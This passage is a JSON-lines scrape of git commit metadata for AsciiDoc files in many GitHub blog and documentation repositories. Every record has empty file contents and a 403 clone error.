2017-03-10-Por-que-escolher-Native-Script.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-03-10-Por-que-escolher-Native-Script.adoc","new_file":"_posts\/2017-03-10-Por-que-escolher-Native-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4bf645c8681f133c5996d6514906065b138d776","subject":"Publish DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","message":"Publish DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_file":"DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2975b8d89de6491164b01d8507f1b0c0cfca82c","subject":"Add README","message":"Add README\n","repos":"sattvik\/baitha","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sattvik\/baitha.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6731c93007a89d15003a3e0d26dccd0628524080","subject":"Updated README","message":"Updated README\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bfe7e044567bcf296a63bf6b6514823767ebd2c","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"060535764d7bfc0baf1ceb4be3074815a2423dca","subject":"Update 2001-01-01-tron-dance.adoc","message":"Update 2001-01-01-tron-dance.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2001-01-01-tron-dance.adoc","new_file":"_posts\/2001-01-01-tron-dance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3e8a4ae1dcdb4ea4ce34c9038db66e0644c1695","subject":"Update 2015-12-14-AB-testing.adoc","message":"Update 2015-12-14-AB-testing.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-14-AB-testing.adoc","new_file":"_posts\/2015-12-14-AB-testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2dc643449cc2d20c168aa8466b203a121218a745","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da5bdbd62e674dd8f518ad1c4ab9fedff2b2586a","subject":"Update 2009-04-20-Oracle-will-buy-Sun.adoc","message":"Update 2009-04-20-Oracle-will-buy-Sun.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2009-04-20-Oracle-will-buy-Sun.adoc","new_file":"_posts\/2009-04-20-Oracle-will-buy-Sun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15fe85528179cbf9fb3152e8eb679e922dfd38fa","subject":"Update 2015-07-02-Mein-erster-Beitrag.adoc","message":"Update 2015-07-02-Mein-erster-Beitrag.adoc","repos":"havvazaman\/havvazaman.github.io,havvazaman\/havvazaman.github.io,havvazaman\/havvazaman.github.io","old_file":"_posts\/2015-07-02-Mein-erster-Beitrag.adoc","new_file":"_posts\/2015-07-02-Mein-erster-Beitrag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/havvazaman\/havvazaman.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0941627bbd4b0889eb7e00e4870c912db1d1fdfa","subject":"Update 2015-09-07-Herzlich-Willkommen.adoc","message":"Update 2015-09-07-Herzlich-Willkommen.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-09-07-Herzlich-Willkommen.adoc","new_file":"_posts\/2015-09-07-Herzlich-Willkommen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a82a998e5bec9152cb17ae9cc75ecfc182a97b4","subject":"Update 2016-04-07-Un-poco-sobre-F-T-P.adoc","message":"Update 2016-04-07-Un-poco-sobre-F-T-P.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Un-poco-sobre-F-T-P.adoc","new_file":"_posts\/2016-04-07-Un-poco-sobre-F-T-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a170da30ef1769fd14c9b23fc4cecc38972554a1","subject":"Explain how to configure the SMS plugin","message":"Explain how to configure the SMS plugin\n","repos":"jotak\/hawkular.github.io,metlos\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2698eef8b846724f2d72d0bfb6aaeb2bce7ca544","subject":"y2b create post The Worst Text You Could Ever Receive...","message":"y2b create post The Worst Text You Could Ever Receive...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-16-The%20Worst%20Text%20You%20Could%20Ever%20Receive....adoc","new_file":"_posts\/2018-02-16-The%20Worst%20Text%20You%20Could%20Ever%20Receive....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d80c78b7dc62e9fce9c07aa4f060ddb2d9b6c379","subject":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6950eeeb698903f1fc610f3a06afc2bed90445d5","subject":"y2b create post Beats Solo3 Wireless - iPhone 7 Headphones","message":"y2b create post Beats Solo3 Wireless - iPhone 7 Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-25-Beats-Solo3-Wireless--iPhone-7-Headphones.adoc","new_file":"_posts\/2016-09-25-Beats-Solo3-Wireless--iPhone-7-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"004d34d8520d9b4f6fbf50892ed377ad487fc1fa","subject":"Update 2016-09-10-In-Appreciation-of-Dusk.adoc","message":"Update 2016-09-10-In-Appreciation-of-Dusk.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-09-10-In-Appreciation-of-Dusk.adoc","new_file":"_posts\/2016-09-10-In-Appreciation-of-Dusk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"488c2fb700b33ad683472a883aade666b1f3cde1","subject":"ISIS-2285: updates generated docs","message":"ISIS-2285: updates generated docs\n","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"core\/config\/src\/main\/adoc\/modules\/config\/examples\/generated\/isis.testing.adoc","new_file":"core\/config\/src\/main\/adoc\/modules\/config\/examples\/generated\/isis.testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dde7a760372cfcd9e69e77ab0e87b02c02bd0fe5","subject":"Update 2015-08-24-Sensit-mon-petit-objet-connecte.adoc","message":"Update 2015-08-24-Sensit-mon-petit-objet-connecte.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2015-08-24-Sensit-mon-petit-objet-connecte.adoc","new_file":"_posts\/2015-08-24-Sensit-mon-petit-objet-connecte.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76c0abd56a4c6782f9d595d7bbe4bf95e7982753","subject":"Update 2016-04-11-Doing-versus-doing-with-feeling.adoc","message":"Update 2016-04-11-Doing-versus-doing-with-feeling.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-11-Doing-versus-doing-with-feeling.adoc","new_file":"_posts\/2016-04-11-Doing-versus-doing-with-feeling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9af421dbf443bc3831d25aa1ce9bbd58116762e5","subject":"Update 2015-11-03-399-euros-Tonto-el-ultimo-Y-porque-decidi-ser-el-ultimo.adoc","message":"Update 2015-11-03-399-euros-Tonto-el-ultimo-Y-porque-decidi-ser-el-ultimo.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-11-03-399-euros-Tonto-el-ultimo-Y-porque-decidi-ser-el-ultimo.adoc","new_file":"_posts\/2015-11-03-399-euros-Tonto-el-ultimo-Y-porque-decidi-ser-el-ultimo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e81ffe0bab022de6697f69b41fa1253e739d93e0","subject":"Update 2016-7-8.adoc","message":"Update 2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-8.adoc","new_file":"_posts\/2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26fd4c6bad9b8a5f59f1f45bd4eb8fc101997aa4","subject":"Update 2017-01-18-Git-Hub-Pages-Portfolio-Sites-for-Non-coding-Journalists.adoc","message":"Update 2017-01-18-Git-Hub-Pages-Portfolio-Sites-for-Non-coding-Journalists.adoc","repos":"joshuarrrr\/hubpress.io,joshuarrrr\/hubpress.io,joshuarrrr\/hubpress.io,joshuarrrr\/hubpress.io","old_file":"_posts\/2017-01-18-Git-Hub-Pages-Portfolio-Sites-for-Non-coding-Journalists.adoc","new_file":"_posts\/2017-01-18-Git-Hub-Pages-Portfolio-Sites-for-Non-coding-Journalists.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuarrrr\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6dacdbe5318b01dfdfcbdb0acf56fa1cb07ebcf","subject":"y2b create post Amazon Kindle Fire Package Winner Announcement","message":"y2b create post Amazon Kindle Fire Package Winner Announcement","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-02-28-Amazon-Kindle-Fire-Package-Winner-Announcement.adoc","new_file":"_posts\/2012-02-28-Amazon-Kindle-Fire-Package-Winner-Announcement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81af65ad557475e89a1ef1e875bd700abc1c80c8","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fcd329f742b56ffab7c37f0859136173c68c530","subject":"Update 2017-05-14-Thats-Relevant.adoc","message":"Update 2017-05-14-Thats-Relevant.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-05-14-Thats-Relevant.adoc","new_file":"_posts\/2017-05-14-Thats-Relevant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"285cab51b7013a21473aca3f5a70048b604e6e6e","subject":"y2b create post GTA V MIDNIGHT LAUNCH!","message":"y2b create post GTA V MIDNIGHT LAUNCH!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-17-GTA-V-MIDNIGHT-LAUNCH.adoc","new_file":"_posts\/2013-09-17-GTA-V-MIDNIGHT-LAUNCH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36235235663c22a35d8f28aa039ca34dfbe39299","subject":"Update 2014-1-1-A-Man-Without-a-Country.adoc","message":"Update 2014-1-1-A-Man-Without-a-Country.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-1-1-A-Man-Without-a-Country.adoc","new_file":"_posts\/2014-1-1-A-Man-Without-a-Country.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d7cdee9c3cfefc09642c37610959993e1508049","subject":"Update 2015-09-16-JavaZone-2015-wrap-up.adoc","message":"Update 2015-09-16-JavaZone-2015-wrap-up.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-09-16-JavaZone-2015-wrap-up.adoc","new_file":"_posts\/2015-09-16-JavaZone-2015-wrap-up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6270bcddf1db32e61a3429a8f768ed6bb2661940","subject":"Update 2018-01-15-Episode-123-Saucy-Sounds-from-Stepansky.adoc","message":"Update 2018-01-15-Episode-123-Saucy-Sounds-from-Stepansky.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2018-01-15-Episode-123-Saucy-Sounds-from-Stepansky.adoc","new_file":"_posts\/2018-01-15-Episode-123-Saucy-Sounds-from-Stepansky.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af0ccd3dd10e921942c9d1ad29898c23c0820636","subject":"Update 2016-10-31-The-state-of-Macbooks.adoc","message":"Update 2016-10-31-The-state-of-Macbooks.adoc","repos":"laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io","old_file":"_posts\/2016-10-31-The-state-of-Macbooks.adoc","new_file":"_posts\/2016-10-31-The-state-of-Macbooks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laposheureux\/laposheureux.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d10f69eafa6ca18f4a853447100e2fc87b4df667","subject":"Update 2018-08-21-Convert-snake-case-to-camel-Case-in-Vim.adoc","message":"Update 2018-08-21-Convert-snake-case-to-camel-Case-in-Vim.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2018-08-21-Convert-snake-case-to-camel-Case-in-Vim.adoc","new_file":"_posts\/2018-08-21-Convert-snake-case-to-camel-Case-in-Vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f329c07f5f5a4ab627c4a0a36cf02549b67b6795","subject":"\u589e\u52a0\u65b0\u6587\u4ef6","message":"\u589e\u52a0\u65b0\u6587\u4ef6\n","repos":"diguage\/jdk-source-analysis,diguage\/jdk-source-analysis,diguage\/jdk-source-analysis","old_file":"ConcurrentHashMap.adoc","new_file":"ConcurrentHashMap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diguage\/jdk-source-analysis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cdd135d17295e8f0df5ca6ca103e55cccb56c273","subject":"Add initial contributing guidelines","message":"Add initial contributing guidelines\n","repos":"maxandersen\/gdoc2adoc","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/maxandersen\/gdoc2adoc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f85de59167cb2b4d1276fd37f67a8504cb2fd6f","subject":"added","message":"added\n","repos":"m-m-m\/transaction","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/transaction.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe997283d1b20c685f743e528328bbe99519549e","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-sleuth.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"47533f6c06e591ebf7e7c87b75db8371bd0ddc0c","subject":"common snippet : tip scaffolding","message":"common snippet : tip scaffolding\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-tipScaffolding.adoc","new_file":"src\/main\/docs\/common-tipScaffolding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d2c57fb2043eff96df5450de69cabb727f7c5d6d","subject":"y2b create post Apple Is Deliberately Slowing Down Your iPhone","message":"y2b create post Apple Is Deliberately Slowing Down Your iPhone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-23-Apple%20Is%20Deliberately%20Slowing%20Down%20Your%20iPhone.adoc","new_file":"_posts\/2017-12-23-Apple%20Is%20Deliberately%20Slowing%20Down%20Your%20iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdc8e61b8187f4e53e80547e0c6628e22127136a","subject":"Announcement for 0.6.2","message":"Announcement for 0.6.2\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2017-11-15-debezium-0-6-2-released.adoc","new_file":"blog\/2017-11-15-debezium-0-6-2-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89539897229b581a5a575a0f53a4b47c96976e2f","subject":"DeveloperGuide.adoc: Add step for updating version number in MainApp (#543)","message":"DeveloperGuide.adoc: Add step for updating version number in MainApp (#543)\n\nWhen doing a new release, MainApp#VERSION needs to be updated to match\r\nthe release version number.\r\n\r\nThis step is not reflected in DeveloperGuide.adoc's release devops\r\nprocedure.\r\n\r\nLet's add the step for updating the version number in MainApp.","repos":"damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,se-edu\/addressbook-level3,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4","old_file":"docs\/DeveloperGuide.adoc","new_file":"docs\/DeveloperGuide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/se-edu\/addressbook-level3.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b8e1759c6c7ddabb3bb515cb24c0dcfc42a941f","subject":"Added first draft man page\/API doc in asciidoc format","message":"Added first draft man page\/API doc in asciidoc format\n","repos":"Omnikron13\/phlite","old_file":"doc\/phlite.adoc","new_file":"doc\/phlite.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Omnikron13\/phlite.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8ac56950d89767442663a87d083b57a52f11f67","subject":"D3 layout int\u00e9ressant","message":"D3 layout int\u00e9ressant\n","repos":"autosvg\/autosvg,autosvg\/autosvg,autosvg\/autosvg","old_file":"docs\/notes.adoc","new_file":"docs\/notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/autosvg\/autosvg.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"7a7ad127ec47feb0acf661e3e34699b2a72ad10a","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/the_age_of_constructive_conversation.adoc","new_file":"content\/writings\/the_age_of_constructive_conversation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"546d1ed58247bf6be8611ceffffaa21cde74712e","subject":"add big oh notation","message":"add big oh notation\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"bigONotation.adoc","new_file":"bigONotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"0a5daa830041b4b8dc7ebe855abb65491546a24b","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c578bdd05104c61bd4a21f4096c65e8d8339ac9a","subject":"Create 2015-04-29-JVM-Study.adoc","message":"Create 